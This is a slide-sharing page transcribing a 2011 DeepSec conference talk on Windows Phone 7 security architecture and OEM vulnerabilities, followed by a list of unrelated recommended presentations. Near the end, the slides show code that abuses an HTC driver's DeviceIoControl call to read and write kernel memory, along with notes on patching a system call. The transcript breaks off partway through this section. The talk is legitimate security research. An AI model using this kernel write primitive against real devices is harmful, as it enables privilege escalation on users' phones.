deepsec 2011 windows pwn 7 oem owned every mobile
play

DeepSec 2011 Windows Pwn 7 OEM Owned Every Mobile? Alex Plaskett - PowerPoint PPT Presentation

Jun 03, 2023 •190 likes •1.06k views

DeepSec 2011 Windows Pwn 7 OEM Owned Every Mobile? Alex Plaskett November 2011 Main Objectives Provide a brief overview of WP7 OS and the security model Allow developers / security professionals to understand the platform

  1. DeepSec 2011 Windows Pwn 7 OEM – Owned Every Mobile? Alex Plaskett – November 2011

  2. Main Objectives • Provide a brief overview of WP7 OS and the security model • Allow developers / security professionals to understand the platform security better. • Highlight potential weaknesses in the security model 2

  3. Who am I? • Security Consultant @ MWR InfoSecurity • Presented at 44con, Blue Hat and T2 recently on WP7 • Breaking stuff for fun for a while  05/10/11

  4. What this talk will cover • Introduction to WP7 • WP7 OS Security Model • Vulnerabilities 4

  5. What this talk will not cover • Managed Application Security C# • Cloud Storage Security • UIX Native Applications 5

  6. WP7 Phones • Multiple OEMs/Phones • Same base OS • OEM Apps and Drivers • Closed Platform 05/10/11

  7. Windows Phone OS 7 • Custom Windows CE 6/7 • ARM v7 Processors • 32bit OS (4GB Virtual Address Space) • 2GB Kernel/2GB User land • Windows Updates via Zune Tethering 05/10/11

  8. Application Model • Third parties - C# Silverlight/XNA Framework .NET CLR • MO/OEMs native code • No side loading • Marketplace Verification / Signing 05/10/11

  9. Security Model • Chamber Based Security Model • Code Signing • Loader Verifier Framework • Policy Framework • Exploit Mitigation 05/10/11

  10. Chamber Based Security Model 05/10/11

  11. Dynamic Capabilities (LPC Chamber) • WPManifest.xml: • ID_CAP_CAMERA • ID_CAP_INTEROPSERVICES • ID_CAP_LOCATION • ID_CAP_MEDIALIB • ID_CAP_MICROPHONE • ID_CAP_NETWORKING 05/10/11

  12. Code Signing • In ROM binaries implicitly trusted • Other binaries require signing • Exception is developer unlocked devices 05/10/11

  13. Code Signing ciroots.pks: 05/10/11

  14. Code Signing Example <Macro Id="TCB_CA" Description="SHA1 Hash of TCB CA" Value="CERTIFICATES/HASH/SHA1/4E719A55 C9DA0A922AA1338B5C700CCDBCA96FEE" /> <Rule PriorityCategoryId="PRIORITY_STANDARD" ResourceIri="/LOADERVERIFIER/GLOBAL/CER TIFICATES/HASH/SHA1/4E719A55C9DA0A922A A1338B5C700CCDBCA96FEE" SpeakerAccountId="S-1-5-112-0-0-1" Description="System identity group honors TCB_CA Cert"> <Authorize> <Match AccountId="S-1-5-112-0-0X01" AuthorizationIds="LV_ACCESS_EXECUTE" /> </Authorize> </Rule> 05/10/11

  15. Loader Verifier Module (LVMOD) • Kernel Based Module (TCB) • Authentication and Authorisation • Policy framework • Code Signing • accountdb.vol => account database • policydb.vol => policy database 05/10/11

  16. Loader Verifier Module (LVMOD) • LoaderVerifierAuthenticateFile • LoaderVerifierAuthorize • LoaderVerifierProvisionSecurity ForApplication 05/10/11

  17. Policy Framework • XML based • Module Policy XML Combined • Centralised policydb.vol database • TCB protected 05/10/11

  18. IRIs • / REGISTRY/HKCU/SOFTWARE/ MICROSOFT/CONMAN/(*) • / FILESYSTEM/PRIMARY/APPLI CATION%20DATA/PHONE %20TOOLS/10.0/CORECON/LIB /(*) • / RESOURCES/CREDMAN/PRIV ATE/S-1-5-122-0-0X10- 0X00000006/(*) 05/10/11 • /KERNEL/(+)/GLOBAL/SQL/

  19. Policy Example <Rule Description="Authorize taskhost.exe be loadable to $ (TASKHOST_CHAMBER_SID)" ResourceIri="$ (LOADERVERIFIER_EXE_AUTHZ_INROM_ROOT )/WINDOWS/TASKHOST.EXE" SpeakerAccountId="$ (SYSTEM_USER_NAME)" PriorityCategoryId="PRIORITY_HIGH"> <Authorize> <Match AccountId="$(TASKHOST_CHAMBER_SID)" AuthorizationIds="LV_ACCESS_EXECUTE,LV_ACCESS_ LOAD" /> </Authorize> <Stop> 05/10/11

  20. Process Creation • CreateProcess() <Rule PriorityCategoryId="PRIORITY_STANDARD" ResourceIri="/LOADERVERIFIER/ACCOUNT/(+ )/ACCOUNT_CAN_LAUNCH/NONE/NONE/PRIMARY/ WINDOWS/CPROG.EXE" SpeakerAccountId="S-1-5- 112-0-0-1" Description="Authorization rule for capability ID_CAP_IE"> <Authorize> <Match AccountId="S-1-5-112-0-0X71- 0X49445F4341505F4945" AuthorizationIds="LV_ACCESS_EXECUTE" /> </Authorize> </Rule> 05/10/11

  21. Resource Access Requests • Resources are protected by policy rules • If a request is made to access a resource outside of the current chamber a policy decision has to be made (PolicyEngine!PolicyCh ). • Policy dictates whether access to resource is granted or not. • IRI’s used to look up rules that apply to the resource requested. PID:00400002 TID:0DAC003A (3) Rsrc="/REGISTRY/HKLM/SYSTEM/SOFTKEYS" PID:00400002 TID:0DAC003A (3) Acct(s)=S-1-5-112-0-0X80- 0X7B30393636323134322D454 239422D343734382D394234382D4633333135394432364536317D PID:00400002 TID:0DAC003A (5) 05/10/11

  22. Exploit Mitigation • ASLR (Address Space Layout Randomization). • XN (Execute Never) 05/10/11

  23. WP7 Exploit Development Lifecycle 05/10/11

  24. Other Platform OEM Vulnerabilities • Android HTC Browser INSTALL Permissions HTC Sound Recorder HTC Logger • iPhone / BlackBerry: N/A 05/10/11

  25. Vulnerabilities • Device Fingerprinting • Browser Vulnerabilities • ID_CAP_INTEROPSERVICES • Device Driver Vulnerabilities • OMA-DM PROVXML 05/10/11

  26. Device Fingerprinting • User-Agent HTTP request: User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows Phone OS 7.0; Trident/3.1; IEMobile/7.0; HTC; HD7 T9292) User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows Phone OS 7.0; Trident/3.1; IEMobile/7.0; SAMSUNG; OMNIA7; Orange) • UA-CPU: ARM 05/10/11

  27. Initial Code Execution - Browser Vulnerabilities /Application Vulnerabilities • Requires ASLR/XN bypass to execute arbitrary code • Stuck in the LPC chamber! (Needs priv esc for most sensitive data ). 05/10/11

  28. •ID_CAP_INTEROPSERVICES • “ID_CAP_INTEROPSERVICES :Capability for hybrid app to access driver and service “ • Undocumented • Microsoft.Phone.InteropService s.dll • WPInteropManifest.xml in XAP archive. 05/10/11

  29. Device Driver Vulnerabilities • HTC HD 7 HTCUtility.dll read/write of kernel memory through a DeviceIoControl call. struct REQUEST { DWORD bMode; PDWORD pdwAddress; }; DWORD result = dwValue; // Value to write req.bMode = 1; // 0 = Read, 1 = Write HANDLE h1 = CreateFileW(L"HTU0:",0xC0000000,0x3,0,0,0,0); DeviceIoControl(h1, 0x9020002C ,&req,0x8,&result,0x4,0,0 ); 05/10/11

  30. Kernel Read/Write Exploit • Patch a System call in the kernel ⇒ Locate system call table. The KDataStruct was chosen because it resides at a fixed memory address (0xFFFFC800). LPDWORD lpvTls; /* 0x000 Current thread local storage pointer */ 4 bytes HANDLE ahSys[NUM_SYS_HANDLES]; /* 0x004 If this moves, change kapi.h */ 128 handles char bResched; /* 0x084 reschedule flag */ char cNest; /* 0x085 kernel exception nesting */ char bPowerOff; /* 0x086 TRUE during "power off" processing */ char bProfileOn; /* 0x087 TRUE if profiling enabled */ ulong unused; /* 0x088 unused */ ulong rsvd2; /* 0x08c was DiffMSec */ PPROCESS pCurPrc; /* 0x090 ptr to current PROCESS struct */ PTHREAD pCurThd; /* 0x094 ptr to current THREAD struct */ DWORD dwKCRes; /* 0x098 */ ulong handleBase; /* 0x09c handle table base address */ PSECTION aSections[64]; /* 0x0a0 section table for virutal memory */ LPEVENT alpeIntrEvents[SYSINTR_MAX_DEVICES];/* 0x1a0 */ LPVOID alpvIntrData[SYSINTR_MAX_DEVICES]; /* 0x220 */ ulong pAPIReturn; /* 0x2a0 direct API return address for kernel mode */ uchar *pMap; /* 0x2a4 ptr to MemoryMap array */ DWORD dwInDebugger; /* 0x2a8 !0 when in debugger */ PTHREAD pCurFPUOwner; /* 0x2ac current FPU owner */ 05/10/11 PPROCESS pCpuASIDPrc; /* 0x2b0 current ASID proc */ long nMemForPT; /* 0x2b4 - Memory used for PageTables */ long alPad[18]; /* 0x2b8 - padding */

Recommend

SirepRAT Windows IoT Core Abusing a Windows service for RCE About Me 7+ years in InfoSec

SirepRAT Windows IoT Core Abusing a Windows service for RCE About Me 7+ years in InfoSec

SirepRAT Windows IoT Core Abusing a Windows service for RCE About Me 7+ years in InfoSec Security Researcher @Safebreach Presented at DEFCON, DEEPSEC, Hackfest @bemikre Contents 1. Windows IoT Core 2. Live SirepRAT

967 views • 74 slides
Mobile Web Applications using HTML5 L. Cotfas 14 Dec. 2011 Reasons for mobile web development

Mobile Web Applications using HTML5 L. Cotfas 14 Dec. 2011 Reasons for mobile web development

Mobile Web Applications using HTML5 L. Cotfas 14 Dec. 2011 Reasons for mobile web development Many different platforms: Android, IPhone, Symbian, Windows Phone/ Mobile, MeeGo (only a few of them) Reasons for mobile web development

435 views • 31 slides
to a Persistent Threat Jagadeesh Chandraiah DeepSec 2011 Agenda FakeAV Trends Infection

to a Persistent Threat Jagadeesh Chandraiah DeepSec 2011 Agenda FakeAV Trends Infection

Fake Antivirus- Journey from Trojan to a Persistent Threat Jagadeesh Chandraiah DeepSec 2011 Agenda FakeAV Trends Infection Vectors Packer Evolution How do they work ? DeepSec 2011 Introduction Fake AntiVirus (FakeAV) is a

794 views • 51 slides
10 steps forward &amp; 5 steps backward DeepSec 2011 Sourabh Satish Distinguished Engineer/

10 steps forward &amp; 5 steps backward DeepSec 2011 Sourabh Satish Distinguished Engineer/

Behavioral Security: 10 steps forward &amp; 5 steps backward DeepSec 2011 Sourabh Satish Distinguished Engineer/ Chief Architect, Symantec Behavioral Security - DeepSec 2011 1 Agenda Threat Landscape 1 Behavioral Security Overview 2

1.26k views • 61 slides
Mobile survey and asset management KOREC Latest Technology K-Portal Video K-Mobile field

Mobile survey and asset management KOREC Latest Technology K-Portal Video K-Mobile field

Mobile survey and asset management KOREC Latest Technology K-Portal Video K-Mobile field software K-Mobile Field software Workplace Trends - BYOD Company owned devices Employee owned personal devices Company owned devices, issued

463 views • 14 slides
Windows Not just for houses Windows 1-10 Windows Server Essentially a jacked up windows 8 box

Windows Not just for houses Windows 1-10 Windows Server Essentially a jacked up windows 8 box

Windows Not just for houses Windows 1-10 Windows Server Essentially a jacked up windows 8 box - Still GUI based - Still makes no sense - No start menu :( - (Install classic shell)... trust me... Windows Server What can it do? - Email

1.06k views • 37 slides
Usability and Small Screens SWEN-444 iPhone Android Windows Phone 8 The phrase mobile

Usability and Small Screens SWEN-444 iPhone Android Windows Phone 8 The phrase mobile

Usability and Small Screens SWEN-444 iPhone Android Windows Phone 8 The phrase mobile usability is pretty much an oxymoron. It's neither easy nor pleasant to use the Web on mobile devices. designing for mobile is hard

337 views • 14 slides
Bringing the Open Web to Mobile Devices November 17, 2011 Thursday, November 17, 11 Outline

Bringing the Open Web to Mobile Devices November 17, 2011 Thursday, November 17, 11 Outline

Bringing the Open Web to Mobile Devices November 17, 2011 Thursday, November 17, 11 Outline Thursday, November 17, 11 Welcome to Mozilla Firefox A public-benefit non-profit foundation and 450+ MILLION USERS wholly-owned corporation 80+

421 views • 20 slides
SECURITY CHALLENGES FOR INTERNET TECHNOLOGIES ON MOBILE DEVICES Key Questions 1. How are Web

SECURITY CHALLENGES FOR INTERNET TECHNOLOGIES ON MOBILE DEVICES Key Questions 1. How are Web

Anil Dhawan, Program Manager Rich Internet Applications Windows Mobile [anild@microsoft.com] Geir Olsen, Program Manager Security for Windows Mobile [geiro@microsoft.com] Microsoft Corp SECURITY CHALLENGES FOR INTERNET TECHNOLOGIES ON

454 views • 6 slides
Windows Not Just For Houses Everyone Uses Windows! Versions of Windows 10 There are multiple

Windows Not Just For Houses Everyone Uses Windows! Versions of Windows 10 There are multiple

Windows Not Just For Houses Everyone Uses Windows! Versions of Windows 10 There are multiple different versions of Windows 10 that support different features The version of Windows that we will be using is Enterprise edition This

973 views • 53 slides
When E.T. comes into Windows Mobile 6 a.k.a. PoC(k)ET Cedric Halbronn Sogeti / ESEC R&amp;D

When E.T. comes into Windows Mobile 6 a.k.a. PoC(k)ET Cedric Halbronn Sogeti / ESEC R&amp;D

When E.T. comes into Windows Mobile 6 a.k.a. PoC(k)ET Cedric Halbronn Sogeti / ESEC R&amp;D cedric(at)security-labs.org Hack.lu 2009 Context / Objectives Technical aspects of WM6 Implementation Demo Conclusion Context / Objectives 1

859 views • 59 slides
Mobile Business and Applications F. Ricci 2010/2011 Content Mobile Market why mobile?

Mobile Business and Applications F. Ricci 2010/2011 Content Mobile Market why mobile?

Mobile Business and Applications F. Ricci 2010/2011 Content Mobile Market why mobile? Mobile as a medium E-Commerce Application Areas: 1. Sales Force Automation 2. Field Force Automation 3. Warehouse &amp; Stock Management 4.

762 views • 54 slides
Windows 8 Heap Internals Windows 8 Heap Internals Windows 8 Heap Internals INTRODUCTION Windows 8

Windows 8 Heap Internals Windows 8 Heap Internals Windows 8 Heap Internals INTRODUCTION Windows 8

Windows 8 Heap Internals Windows 8 Heap Internals Windows 8 Heap Internals INTRODUCTION Windows 8 Heap Internals Who Chris Valasek (@nudehaberdasher) Sr. Research Scientist Coverity Tarjei Mandt (@kernelpool) Vulnerability

1.33k views • 91 slides
Ubiquitous and Mobile Computing CS 528: A Survey of Mobile Malware in the Wild Alex Fortier

Ubiquitous and Mobile Computing CS 528: A Survey of Mobile Malware in the Wild Alex Fortier

Ubiquitous and Mobile Computing CS 528: A Survey of Mobile Malware in the Wild Alex Fortier Computer Science Dept. Worcester Polytechnic Institute (WPI) What is mobile malware? Targeted at Android, iOS, Symbian (discontinued), Windows Phone

507 views • 17 slides
Results of a Security Assessment of the Internet Protocol version 6 (IPv6) Fernando Gont

Results of a Security Assessment of the Internet Protocol version 6 (IPv6) Fernando Gont

Results of a Security Assessment of the Internet Protocol version 6 (IPv6) Fernando Gont Fernando Gont DEEPSEC 2011 Conference DEEPSEC 2011 Conference Vienna, Austria, November Vienna, Austria, November 15-18, 2011 15-18, 2011 About...

422 views • 41 slides
A look inside the Windows Kernel CVE-2011-1237 Evolution from XP to 8 Bruno Pujos

A look inside the Windows Kernel CVE-2011-1237 Evolution from XP to 8 Bruno Pujos

A look inside the Windows Kernel Bruno Pujos Introduction Basics of Windows Kernel A look inside the Windows Kernel CVE-2011-1237 Evolution from XP to 8 Bruno Pujos CVE-2013-3660 Conclusion LSE July 18, 2013 Plan A look inside the

1.55k views • 95 slides
Presenta(on The Company SODAI Italia S.p.A. is a company 100% owned by Italveco Group that

Presenta(on The Company SODAI Italia S.p.A. is a company 100% owned by Italveco Group that

Presenta(on The Company SODAI Italia S.p.A. is a company 100% owned by Italveco Group that acquired in 2011 the full control of the company and relevant assets previously owned by two major Government Enterprises: Trenitalia (State Owned

499 views • 10 slides
Mobile VoIP Steganography From Framework to Implementation Marcus Nutzinger Rainer Poisel

Mobile VoIP Steganography From Framework to Implementation Marcus Nutzinger Rainer Poisel

Mobile VoIP Steganography From Framework to Implementation Marcus Nutzinger Rainer Poisel Jrgen Wurzer Institute of IT Security Research St. Plten University of Applied Sciences DeepSec 2010 November 25 th 2010 Mobile VoIP Steganography

528 views • 27 slides
Next generation mobile communications for blue light users - state-owned versus commercial network

Next generation mobile communications for blue light users - state-owned versus commercial network

Next generation mobile communications for blue light users - state-owned versus commercial network solutions Analysys Mason Amund Kvalbein, Jon Ivar Kroken, Harald Wium Lie PPDR Cost model 2 Background and objectives MSB has been asked

228 views • 12 slides
The Differences in Water Rates of Municipal and Investor-Owned Utilities Municipal and Investor

The Differences in Water Rates of Municipal and Investor-Owned Utilities Municipal and Investor

The Differences in Water Rates of Municipal and Investor-Owned Utilities Municipal and Investor Owned Utilities in California Christian L. Aldinger, CPA NARUC 2011 Winter Committee Meeting February 14, 2011 y , Washington, D.C. Working

510 views • 23 slides
mc-a ISSUED DATE McAlpine Architecture PC (T) E-mail: 34-26 Street 212.366 .0700

mc-a ISSUED DATE McAlpine Architecture PC (T) E-mail: 34-26 Street 212.366 .0700

WINDOWS TO BE REPLACED, APT. 508/509 UPPER SASH OF BATHROOM WINDOW WINDOWS TO BE REPLACED, APT. 508/509 WINDOWS TO BE REPLACED, APT. 508/509 WINDOWS TO BE REPLACED, APT. 508/509 WITH LOUVER IN PLACE OF GLASS FOR A/C mc-a mc-a mc-a mc-a

217 views • 8 slides
Windows NT Security Windows 95, 3.1, 3.11 are basically DOS and they have no security

Windows NT Security Windows 95, 3.1, 3.11 are basically DOS and they have no security

Windows NT Security Windows 95, 3.1, 3.11 are basically DOS and they have no security whatsoever. Windows NT has security features, especially as a computer in a network. Security of Windows NT should be understood correctly. In

592 views • 31 slides
WHAT DRIVES KITOVU MOBILE? Mission: To improve the quality of life of people infected and

WHAT DRIVES KITOVU MOBILE? Mission: To improve the quality of life of people infected and

QUALITY IMPROVEMENT LEARNING SESSION 3 DOCUMENTATION PERIOD: JUNE 2011- DECEMBER 2011 Experience gained by Kitovu Mobile AIDS Organization (Kitovu Mobile) in South West Uganda. Presenter; Nsamba Joseph Presenter; Nsamba Joseph Kitovu Mobile

484 views • 11 slides
Windows 10 Microsoft Lunch &amp; Learn 55% SMBs support a mobile workforce Alignment with MB

Windows 10 Microsoft Lunch &amp; Learn 55% SMBs support a mobile workforce Alignment with MB

Windows 10 Microsoft Lunch &amp; Learn 55% SMBs support a mobile workforce Alignment with MB 81% AMI-Partners GM 2H 2013 Business Strategy SB 73% 97M devices in 2013 AMI-Partners GM 2H 2013 Growing to 147M in 2018 43% of SMB employees

303 views • 3 slides

More recommend